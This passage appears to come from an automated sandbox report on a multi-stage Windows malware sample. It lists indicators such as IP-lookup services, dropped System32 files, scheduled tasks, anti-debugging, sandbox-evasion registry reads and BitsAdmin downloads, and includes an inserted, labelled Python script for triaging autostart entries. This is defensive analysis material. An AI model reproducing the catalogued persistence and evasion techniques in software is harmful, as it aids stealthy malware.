File opened (read-only) | \??\V: | svchost.exe
File opened (read-only) | \??\K: | setting.exe
File opened (read-only) | \??\T: | installer.exe
File opened (read-only) | \??\E: | msiexec.exe
File opened (read-only) | \??\L: | msiexec.exe
File opened (read-only) | \??\M: | svchost.exe
File opened (read-only) | \??\W: | msiexec.exe
File opened (read-only) | \??\K: | installer.exe
File opened (read-only) | \??\O: | msiexec.exe
File opened (read-only) | \??\Y: | msiexec.exe
File opened (read-only) | \??\Z: | setting.exe
File opened (read-only) | \??\W: | installer.exe
File opened (read-only) | \??\Z: | installer.exe
File opened (read-only) | \??\I: | msiexec.exe
File opened (read-only) | \??\R: | msiexec.exe
File opened (read-only) | \??\F: | installer.exe
File opened (read-only) | \??\G: | setting.exe
File opened (read-only) | \??\V: | setting.exe
File opened (read-only) | \??\P: | installer.exe
File opened (read-only) | \??\A: | msiexec.exe
File opened (read-only) | \??\Z: | msiexec.exe
File opened (read-only) | \??\W: | svchost.exe
File opened (read-only) | \??\H: | svchost.exe
File opened (read-only) | \??\N: | svchost.exe
File opened (read-only) | \??\Y: | svchost.exe
File opened (read-only) | \??\J: | setting.exe
File opened (read-only) | \??\Q: | setting.exe
File opened (read-only) | \??\T: | setting.exe
File opened (read-only) | \??\U: | setting.exe
File opened (read-only) | \??\F: | svchost.exe
File opened (read-only) | \??\E: | installer.exe
File opened (read-only) | \??\M: | installer.exe
File opened (read-only) | \??\N: | msiexec.exe
File opened (read-only) | \??\X: | setting.exe
File opened (read-only) | \??\B: | svchost.exe
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 32 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
152 | ipinfo.io
553 | ipinfo.io
569 | ipinfo.io
966 | ip-api.com
630 | wtfismyip.com
739 | wtfismyip.com
1763 | api.2ip.ua
1829 | api.2ip.ua
151 | ipinfo.io
996 | ipinfo.io
1001 | ipinfo.io
1060 | wtfismyip.com
1764 | api.2ip.ua
1810 | api.2ip.ua
185 | ipinfo.io
417 | ipinfo.io
1230 | api.2ip.ua
1231 | api.2ip.ua
1775 | api.2ip.ua
1809 | api.2ip.ua
98 | ip-api.com
384 | ipinfo.io
741 | wtfismyip.com
554 | ipinfo.io
627 | wtfismyip.com
874 | wtfismyip.com
1063 | wtfismyip.com
1283 | api.2ip.ua
383 | ipinfo.io
689 | ip-api.com
1816 | api.2ip.ua
1820 | ip-api.com
-
Drops file in System32 directory 63 IoCs
description | ioc | process
File opened for modification | C:\Windows\System32\Tasks\PowerControl LG | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent CD195E150EE449EB | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Azure-Update-Task | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #1 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Smart Clock | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8408FE5CA4467EE4DA84A76EF238FE3 | mask_svc.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAC.tmp | DrvInst.exe
File created | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAD.tmp | DrvInst.exe
File created | C:\Windows\System32\DriverStore\drvstore.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #5 | svchost.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #3 | svchost.exe
File created | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAC.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\tap0901.cat | DrvInst.exe
File opened for modification | C:\Windows\system32\services64.exe | conhost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\686AD3B12FDB68487AAEA92D0A823EB3 | svchost.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys | DrvInst.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | mask_svc.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #4 | svchost.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\tap0901.sys | DrvInst.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e} | DrvInst.exe
File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | DrvInst.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | mask_svc.exe
File opened for modification | C:\Windows\System32\Tasks\13 | svchost.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAD.tmp | DrvInst.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #2 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #6 | svchost.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | rundll32.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8408FE5CA4467EE4DA84A76EF238FE3 | mask_svc.exe
File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 5F7BD2BE0CAE9B0C | svchost.exe
File created | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF | MicrosoftEdgeCP.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\686AD3B12FDB68487AAEA92D0A823EB3 | svchost.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAB.tmp | DrvInst.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\82CB34DD3343FE727DF8890D352E0D8F | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 0F3E4A66D940DC97 | svchost.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | mask_svc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | mask_svc.exe
File opened for modification | C:\Windows\System32\Tasks\services64 | svchost.exe
File created | C:\Windows\system32\Microsoft\Libs\WR64.sys | conhost.exe
File opened for modification | C:\Windows\System32\Tasks\PowerControl HR | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 03DC67693FB036E5 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\82CB34DD3343FE727DF8890D352E0D8F | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Time Trigger Task | svchost.exe
File opened for modification | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\oemvista.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedUpdater | svchost.exe
File created | C:\Windows\system32\Microsoft\Libs\sihost64.exe | conhost.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File created | C:\Windows\System32\DriverStore\Temp\{3e31b346-9694-114d-890d-e7706feeb03e}\SETDDAB.tmp | DrvInst.exe
File created | C:\Windows\system32\services64.exe | conhost.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf | DrvInst.exe
File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | DrvInst.exe
File opened for modification | C:\Windows\System32\Tasks\BtWbiTx | svchost.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | rundll32.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27 | svchost.exe
File opened for modification | C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat | DrvInst.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | rundll32.exe
File opened for modification | C:\Windows\System32\GroupPolicy | rundll32.exe
-
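Added example, not part of the report: an autostart triage that covers the three persistence signatures above in one pass, the Startup-folder shortcut (SmartClock.lnk written by A2E0.exe), the Run/RunOnce values, and the task definitions written under C:\Windows\System32\Tasks (Smart Clock, Azure-Update-Task, services64 and the rest). The registry values are the report's with the display escaping removed; the SecurityHealth value, the Microsoft\Windows task path and the threshold choices are constructed. Note that task files under System32\Tasks are written by the Task Scheduler service, which runs inside svchost.exe, so the process column names the service and not the process that registered the task.

```python
"""Autostart triage for the Startup-folder, Run/RunOnce and System32\\Tasks
rows in this report. Added example; the report itself contains no code.
"""
import re

USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
GUID_DIR = re.compile(r"\\[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\\", re.I)
TASKS_ROOT = "c:\\windows\\system32\\tasks\\"
STARTUP_DIR = "\\start menu\\programs\\startup\\"


def split_command(value: str):
    """Split a Run value into (image, arguments). A quoted image ends at the
    closing quote; an unquoted one is grown word by word until it ends in
    .exe, so 'C:\\Program Files (x86)\\...' is not cut at the space."""
    value = value.strip()
    if value.startswith('"'):
        end = value.find('"', 1)
        if end == -1:
            return value[1:], ""
        return value[1:end], value[end + 1:].strip()
    words = value.split(" ")
    for i in range(1, len(words) + 1):
        candidate = " ".join(words[:i])
        if candidate.lower().endswith(".exe"):
            return candidate, " ".join(words[i:])
    return words[0], " ".join(words[1:])


def assess_run_value(key: str, value: str):
    """Reasons a Run/RunOnce value deserves a look (empty list = nothing)."""
    image, _args = split_command(value)
    low_image, low_key = image.lower(), key.lower()
    reasons = []
    if any(tok in low_image for tok in USER_WRITABLE):
        reasons.append("image in user-writable location")
    if GUID_DIR.search(low_image):
        reasons.append("image in GUID-named directory")
    if "\\runonce" in low_key and "\\machine\\" in low_key:
        reasons.append("machine-wide RunOnce value")
    return image, reasons


def classify_file(path: str):
    """'startup_lnk' for a Startup-folder shortcut, 'task' for a task
    definition outside the built-in Microsoft\\Windows tree, else None."""
    low = path.lower()
    if STARTUP_DIR in low and low.endswith(".lnk"):
        return "startup_lnk"
    if low.startswith(TASKS_ROOT) and not low.startswith(TASKS_ROOT + "microsoft\\"):
        return "task"
    return None


def triage(run_entries, file_events):
    findings = []
    for key, name, value, proc in run_entries:
        image, reasons = assess_run_value(key, value)
        if reasons:
            findings.append({"kind": "run", "name": name, "image": image,
                             "reasons": reasons, "process": proc})
    for proc, path in file_events:
        kind = classify_file(path)
        if kind:
            findings.append({"kind": kind, "path": path, "process": proc})
    return findings


HKU = "\\REGISTRY\\USER\\S-1-5-21-2481030822-2828258191-1606198294-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
HKLM_RUN = "\\REGISTRY\\MACHINE\\SOFTWARE\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Run"
HKLM_RUNONCE = "\\REGISTRY\\MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce"

# (key, value name, value data, writing process). Data is the report's with
# the display escaping removed; the SecurityHealth entry is constructed.
RUN_ENTRIES = [
    (HKU, "SysHelper", r'"C:\Users\Admin\AppData\Local\e016a640-be85-42ec-91ac-8bb6fe5ea86a\E757.exe" --AutoStart', "E757.exe"),
    (HKU, "WinHost", r"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe", "3340470.exe"),
    (HKLM_RUNONCE, "system recover", r'"C:\Program Files (x86)\Google\Gituzhuzhaesae.exe"', "DYbALA.exe"),
    (HKLM_RUN, "Calculator", r"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --loGQqfG2tg", "setup.exe"),
    (HKLM_RUN, "SecurityHealth", r"C:\Windows\system32\SecurityHealthSystray.exe", "explorer.exe"),
]

# (process, path) from the report's file rows, plus one constructed
# built-in task path and one driver-store write that must not match.
FILE_EVENTS = [
    ("A2E0.exe", r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk"),
    ("svchost.exe", r"C:\Windows\System32\Tasks\Smart Clock"),
    ("svchost.exe", r"C:\Windows\System32\Tasks\Azure-Update-Task"),
    ("svchost.exe", r"C:\Windows\System32\Tasks\services64"),
    ("svchost.exe", r"C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan"),
    ("DrvInst.exe", r"C:\Windows\System32\DriverStore\drvstore.tmp"),
]

if __name__ == "__main__":
    for f in triage(RUN_ENTRIES, FILE_EVENTS):
        print(f)
```

The "system recover" RunOnce value is the one the location rules miss: its image sits under Program Files (x86), so only the hive/key rule catches it, which is why a path allowlist alone is not enough for machine-wide autostart keys.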
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
pid | process
5956 | ZXcnQ9RG_DYkOXXTxjQ0IPtt.exe
5248 | Dg_Ebh8ihIYC1JCfpRAyNWiT.exe
8788 | 366B.exe
10524 | mask_svc.exe
5312 | mask_svc.exe
11108 | mask_svc.exe
-
Suspicious use of SetThreadContext 55 IoCs
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 64 IoCs
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 55 IoCs
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | FastPC.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 10DF.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | CD5.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | build2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | svchost.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | FastPC.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | CD5.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | build2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 10DF.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | vpn.tmp
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | vpn.tmp
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
10940 | schtasks.exe
4008 | schtasks.exe
2832 | schtasks.exe
4032 | schtasks.exe
6116 | schtasks.exe
5800 | schtasks.exe
640 | schtasks.exe
-
Delays execution with timeout.exe 5 IoCs
Processes:
pid | process
3736 | timeout.exe
9240 | timeout.exe
5484 | timeout.exe
2228 | timeout.exe
9416 | timeout.exe
Download via BitsAdmin 1 TTPs 3 IoCs
Processes:
pid | process
8680 | bitsadmin.exe
10172 | bitsadmin.exe
1108 | bitsadmin.exe
Enumerates system info in registry 2 TTPs 2 IoCs
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | SearchUI.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | SearchUI.exe
Kills process with taskkill 14 IoCs
Processes:
pid | process
4064 | taskkill.exe
6456 | taskkill.exe
3312 | taskkill.exe
6356 | taskkill.exe
8916 | taskkill.exe
10508 | taskkill.exe
10184 | taskkill.exe
2144 | taskkill.exe
3888 | taskkill.exe
8812 | taskkill.exe
8856 | taskkill.exe
5880 | taskkill.exe
5900 | taskkill.exe
10688 | taskkill.exe
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdge.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | MicrosoftEdgeCP.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Key created | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Internet Explorer\Main | browser_broker.exe
Modifies data under HKEY_USERS 64 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-461 = "Afghanistan Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-281 = "Central Europe Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-352 = "FLE Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2342 = "Haiti Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | mask_svc.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\A053375BFE84E8B748782C7CEE15827A6AF5A405\Blob = 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 | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1721 = "Libya Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2142 = "Transbaikal Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2572 = "Turks and Caicos Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1661 = "Bahia Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-721 = "Central Pacific Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-211 = "Pacific Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1842 = "Russia TZ 4 Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | mask_svc.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | mask_svc.exe
Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E | msiexec.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-12 = "Azores Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-771 = "Montevideo Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1872 = "Russia TZ 7 Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1861 = "Russia TZ 6 Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-561 = "SE Asia Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2592 = "Tocantins Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | svchost.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-262 = "GMT Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-741 = "New Zealand Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2321 = "Sakhalin Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-631 = "Tokyo Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-41 = "E. South America Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-622 = "Korea Standard Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | DrvInst.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time" | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-541 = "Myanmar Daylight Time" | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | mask_svc.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | mask_svc.exe
Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time" | mask_svc.exe
Modifies registry class 64 IoCs
Processes:
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:" | MicrosoftEdgeCP.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionHigh = "268435456" | MicrosoftEdge.exe
